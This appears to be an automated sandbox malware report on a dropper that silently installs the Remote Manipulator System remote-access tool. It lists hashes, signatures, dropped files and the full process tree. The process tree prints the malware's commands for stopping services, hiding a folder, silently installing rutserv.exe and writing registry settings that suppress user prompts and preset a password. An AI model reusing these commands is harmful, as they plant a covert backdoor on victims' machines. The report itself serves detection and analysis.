Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
27-11-2022 15:20
Static task
static1
Behavioral task
behavioral1
Sample
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
Resource
win7-20220901-en
General
-
Target
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
-
Size
3.3MB
-
MD5
6627f3503fd971c24f274d670b9d6cd7
-
SHA1
b77b984497b6c3d1d695de6363b1b35d9a4c192e
-
SHA256
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e
-
SHA512
cf9210fa61eb5fec5d8d3bf2ea7e22c1f2d5f54c5f80b71c4146f73a4369a3ea0e5b7489750ff6ec00fee347398d023fb8580c1a4e134932cbd3ff555b9f380a
-
SSDEEP
98304:VgwRLgSX5ZcttvsdEv9eL4UezmlplRUSJLWpAh:VgOgSX/GW+1SezmXlRDRT
Malware Config
Signatures
-
Executes dropped EXE 7 IoCs
Processes:
data.exerutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exerfusclient.exepid process 276 data.exe 1640 rutserv.exe 1120 rutserv.exe 2016 rutserv.exe 1996 rutserv.exe 1628 rfusclient.exe 696 rfusclient.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx \Windows\spom\rfusclient.exe upx \Windows\spom\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx behavioral1/memory/1628-108-0x0000000000400000-0x0000000000AE6000-memory.dmp upx \Windows\spom\rfusclient.exe upx C:\Windows\spom\rfusclient.exe upx behavioral1/memory/696-114-0x0000000000400000-0x0000000000AE6000-memory.dmp upx behavioral1/memory/1628-115-0x0000000000400000-0x0000000000AE6000-memory.dmp upx behavioral1/memory/696-117-0x0000000000400000-0x0000000000AE6000-memory.dmp upx -
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1360 cmd.exe -
Loads dropped DLL 7 IoCs
Processes:
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.execmd.exerutserv.exerfusclient.exepid process 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe 1936 cmd.exe 1936 cmd.exe 1936 cmd.exe 1996 rutserv.exe 1996 rutserv.exe 1628 rfusclient.exe -
Processes:
data.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA data.exe -
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\data.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\hide.exe autoit_exe -
Drops file in Windows directory 64 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File opened for modification C:\Windows\spom\dd_vcredistMSI640E.txt cmd.exe File opened for modification C:\Windows\spom\lpksetup-20220901-140302-0.log cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561.html cmd.exe File created C:\Windows\spom\RGI24D0.tmp cmd.exe File created C:\Windows\spom\dd_vcredistMSI640E.txt cmd.exe File created C:\Windows\spom\35675940-12ea-43e6-9a29-2fde6cdfd31c.tmp cmd.exe File opened for modification C:\Windows\spom\4ced5ba9-fb64-4b4f-9d15-e20e648456ab.tmp cmd.exe File created C:\Windows\spom\ASPNETSetup_00001.log cmd.exe File created C:\Windows\spom\dd_vcredistUI640E.txt cmd.exe File opened for modification C:\Windows\spom\ose00000.exe cmd.exe File opened for modification C:\Windows\spom attrib.exe File opened for modification C:\Windows\spom\lpksetup-20220901-135651-0.log cmd.exe File opened for modification C:\Windows\spom\uac.cmd cmd.exe File opened for modification C:\Windows\spom\ASPNETSetup_00001.log cmd.exe File opened for modification C:\Windows\spom\dd_SetupUtility.txt cmd.exe File opened for modification C:\Windows\spom\java_install.log cmd.exe File opened for modification C:\Windows\spom\795ddf6f-7912-4640-8ac1-2353a7f0ea89.tmp cmd.exe File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt cmd.exe File opened for modification C:\Windows\spom\dd_vcredistMSI6476.txt cmd.exe File created C:\Windows\spom\java_install.log cmd.exe File opened for modification C:\Windows\spom\java_install_reg.log cmd.exe File created C:\Windows\spom\lpksetup-20220901-140302-0.log cmd.exe File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561-MSI_netfx_Full_x64.msi.txt cmd.exe File opened for modification C:\Windows\spom\RDE993.tmp cmd.exe File created C:\Windows\spom\b684c365-a914-4e5f-a38a-bb5b0b40a917.tmp cmd.exe File opened for modification C:\Windows\spom\SetupExe(20220901134306790).log cmd.exe File created C:\Windows\spom\wmsetup.log cmd.exe File opened for modification C:\Windows\spom\rutserv.exe cmd.exe File opened for modification C:\Windows\spom\ASPNETSetup_00000.log cmd.exe File created C:\Windows\spom\FXSAPIDebugLogFile.txt cmd.exe File opened for modification C:\Windows\spom\hide.exe cmd.exe File created C:\Windows\spom\jawshtml.html cmd.exe File opened for modification C:\Windows\spom\RGI24D0.tmp cmd.exe File created C:\Windows\spom\ASPNETSetup_00000.log cmd.exe File opened for modification C:\Windows\spom\dd_vcredistUI640E.txt cmd.exe File created C:\Windows\spom\f337ec5d-de05-4a2e-8405-50027a596b4f.tmp cmd.exe File opened for modification C:\Windows\spom\lpksetup-20220901-135957-0.log cmd.exe File opened for modification C:\Windows\spom\nouac.cmd cmd.exe File opened for modification C:\Windows\spom\rfusclient.exe cmd.exe File created C:\Windows\spom\uac.cmd cmd.exe File created C:\Windows\spom\68c96edb-4338-4ded-8ac6-4ae2ce43119b.tmp cmd.exe File opened for modification C:\Windows\spom\68c96edb-4338-4ded-8ac6-4ae2ce43119b.tmp cmd.exe File created C:\Windows\spom\lpksetup-20220901-135047-0.log cmd.exe File created C:\Windows\spom\lpksetup-20220901-135352-0.log cmd.exe File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561.html cmd.exe File created C:\Windows\spom\ose00000.exe cmd.exe File created C:\Windows\spom\RGI24D0.tmp-tmp cmd.exe File opened for modification C:\Windows\spom\35675940-12ea-43e6-9a29-2fde6cdfd31c.tmp cmd.exe File created C:\Windows\spom\dd_vcredistMSI6476.txt cmd.exe File created C:\Windows\spom\dd_vcredistUI6476.txt cmd.exe File created C:\Windows\spom\dd_wcf_CA_smci_20220901_133528_724.txt cmd.exe File opened for modification C:\Windows\spom\e2431e2a-8066-4d94-bbc3-b73a76ab1f0f.tmp cmd.exe File opened for modification C:\Windows\spom\FXSAPIDebugLogFile.txt cmd.exe File opened for modification C:\Windows\spom\jawshtml.html cmd.exe File opened for modification C:\Windows\spom\Admin.bmp cmd.exe File created C:\Windows\spom\java_install_reg.log cmd.exe File opened for modification C:\Windows\spom\lpksetup-20220901-135352-0.log cmd.exe File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561-MSI_netfx_Full_x64.msi.txt cmd.exe File created C:\Windows\spom\RDE993.tmp cmd.exe File created C:\Windows\spom\rfusclient.exe cmd.exe File opened for modification C:\Windows\spom\RGI24D0.tmp-tmp cmd.exe File created C:\Windows\spom\rutserv.exe cmd.exe File created C:\Windows\spom\data.exe cmd.exe File opened for modification C:\Windows\spom\f337ec5d-de05-4a2e-8405-50027a596b4f.tmp cmd.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 1356 sc.exe 1552 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exerfusclient.exepid process 1640 rutserv.exe 1640 rutserv.exe 1640 rutserv.exe 1640 rutserv.exe 1120 rutserv.exe 1120 rutserv.exe 2016 rutserv.exe 2016 rutserv.exe 1996 rutserv.exe 1996 rutserv.exe 1996 rutserv.exe 1996 rutserv.exe 1628 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rutserv.exerutserv.exerutserv.exedescription pid process Token: SeDebugPrivilege 1640 rutserv.exe Token: SeDebugPrivilege 2016 rutserv.exe Token: SeTakeOwnershipPrivilege 1996 rutserv.exe Token: SeTcbPrivilege 1996 rutserv.exe Token: SeTcbPrivilege 1996 rutserv.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
data.exepid process 276 data.exe 276 data.exe 276 data.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
data.exepid process 276 data.exe 276 data.exe 276 data.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
rutserv.exerutserv.exerutserv.exerutserv.exepid process 1640 rutserv.exe 1120 rutserv.exe 2016 rutserv.exe 1996 rutserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exedata.execmd.exenet.exenet.exedescription pid process target process PID 1468 wrote to memory of 276 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 1468 wrote to memory of 276 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 1468 wrote to memory of 276 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 1468 wrote to memory of 276 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe data.exe PID 1468 wrote to memory of 1360 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 1468 wrote to memory of 1360 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 1468 wrote to memory of 1360 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 1468 wrote to memory of 1360 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe cmd.exe PID 276 wrote to memory of 1936 276 data.exe cmd.exe PID 276 wrote to memory of 1936 276 data.exe cmd.exe PID 276 wrote to memory of 1936 276 data.exe cmd.exe PID 276 wrote to memory of 1936 276 data.exe cmd.exe PID 1936 wrote to memory of 464 1936 cmd.exe net.exe PID 1936 wrote to memory of 464 1936 cmd.exe net.exe PID 1936 wrote to memory of 464 1936 cmd.exe net.exe PID 1936 wrote to memory of 464 1936 cmd.exe net.exe PID 464 wrote to memory of 1136 464 net.exe net1.exe PID 464 wrote to memory of 1136 464 net.exe net1.exe PID 464 wrote to memory of 1136 464 net.exe net1.exe PID 464 wrote to memory of 1136 464 net.exe net1.exe PID 1936 wrote to memory of 524 1936 cmd.exe net.exe PID 1936 wrote to memory of 524 1936 cmd.exe net.exe PID 1936 wrote to memory of 524 1936 cmd.exe net.exe PID 1936 wrote to memory of 524 1936 cmd.exe net.exe PID 524 wrote to memory of 1404 524 net.exe net1.exe PID 524 wrote to memory of 1404 524 net.exe net1.exe PID 524 wrote to memory of 1404 524 net.exe net1.exe PID 524 wrote to memory of 1404 524 net.exe net1.exe PID 1936 wrote to memory of 1552 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1552 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1552 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1552 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1356 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1356 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1356 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1356 1936 cmd.exe sc.exe PID 1936 wrote to memory of 1672 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1672 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1672 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1672 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1556 1936 cmd.exe attrib.exe PID 1936 wrote to memory of 1556 1936 cmd.exe attrib.exe PID 1936 wrote to memory of 1556 1936 cmd.exe attrib.exe PID 1936 wrote to memory of 1556 1936 cmd.exe attrib.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1640 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1120 1936 cmd.exe rutserv.exe PID 1936 wrote to memory of 1908 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1908 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1908 1936 cmd.exe reg.exe PID 1936 wrote to memory of 1908 1936 cmd.exe reg.exe PID 1936 wrote to memory of 756 1936 cmd.exe reg.exe PID 1936 wrote to memory of 756 1936 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\data.exe"C:\Users\Admin\AppData\Local\Temp\data.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c nouac.cmd3⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop netaservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop netaservice5⤵
-
C:\Windows\SysWOW64\net.exenet stop rmanservice4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rmanservice5⤵
-
C:\Windows\SysWOW64\sc.exesc delete rmanservice4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc delete netaservice4⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SYSTEM\Remote Manipulator System" /f4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Windows\spom"4⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /silentinstall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /firewall4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e006600720061006e006b006400650062006f006500720040006d00610069006c002e0063006f006d003c002f0065006d00610069006c003e003c00690064003e007b00450043004500370036003700360031002d0034004500420039002d0034003000380046002d0041003000410043002d003300370042003600370042004100330045004100420044007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c084869646553746f70080c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323030392e37343435313730303233084c6963656e73657306ae524d532d462d62366665664645334436363231346539363944333744396163653235423032366269593253326459586c52664477776e4932314758554a4544683945586d78785030594756304a5856513066506a6c74446c46564467594841514271664738645556554f446c5246446d42346667494e4841494341514a76594878704141734c4141734d486c516d63323952566b554f41677765557a773562513458576c564c623168654e434a740d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a1144697361626c65496e7465726e65744964080b536166654d6f64655365740800004⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a004⤵
-
C:\Windows\spom\rutserv.exe"rutserv.exe" /start4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵
- Deletes itself
-
C:\Windows\spom\rutserv.exeC:\Windows\spom\rutserv.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray3⤵
- Executes dropped EXE
-
C:\Windows\spom\rfusclient.exeC:\Windows\spom\rfusclient.exe /tray2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmdFilesize
300B
MD5a47e0180694389aee99b8e5593d5dced
SHA1925927658ea434258d2e26e8a8aa49a063376076
SHA256784e908ccad4e77d92be78cc2be0f502d29d0cf6e65331b56720cf0e5ad8b195
SHA5125d03369ccc1056b50609698d103c4f8694842a29329dccab7fd443af790c2575fd8a1877f78b58f136a428faa6375c51a74f56ab7eded219a58e7e4aef678c41
-
C:\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\data.exeFilesize
819KB
MD571a944406c89ab321cb1e55c37916d70
SHA1be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA2564f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA5129ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\hide.exeFilesize
819KB
MD572cc4ab6ee23c79bbeed4c4d7b31f741
SHA1a5598acb794ebbbad6c0819c20f6f7ed99541e89
SHA2565be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73
SHA5124840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5
-
C:\Users\Admin\AppData\Local\Temp\nouac.cmdFilesize
10KB
MD56786599aff4e8eb99164bdcbd3e7397b
SHA1be5daca8309b33310a59d253876ae49e4f26f3d7
SHA256ccc3c629937f5e26cf78de269feb5739cb2d859ab099312a8089afd98a1b2748
SHA5125925c7227cacf2a26a26a79e49b4b6aeacda862ef2fff7c879e679f5ee5e0fc87bf33cb0d8b5681b570977bf9d415dbfd2ec31c6fe4a03b90af47fe3a7e8e783
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exeFilesize
1.8MB
MD53afec4347159849e4ef50d179ff1fed7
SHA19b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA2567ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exeFilesize
6.3MB
MD593a4649d70ce76d6815874fc7a72c6fb
SHA11e9f663fd9cb66140001847849ddf0451365233f
SHA2566dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Users\Admin\AppData\Local\Temp\uac.cmdFilesize
10KB
MD509bf5a799d46c218ee4d99b9083800ac
SHA105927f2aa870eefc12c2883600502e6ed2ff37e5
